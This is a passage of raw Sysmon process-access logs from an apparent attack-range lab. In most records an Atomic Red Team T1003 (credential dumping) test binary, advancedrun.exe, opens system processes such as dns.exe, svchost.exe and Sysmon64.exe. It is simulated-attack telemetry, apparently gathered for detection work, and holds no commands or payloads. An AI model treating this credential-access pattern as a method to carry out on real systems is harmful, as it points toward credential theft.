Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 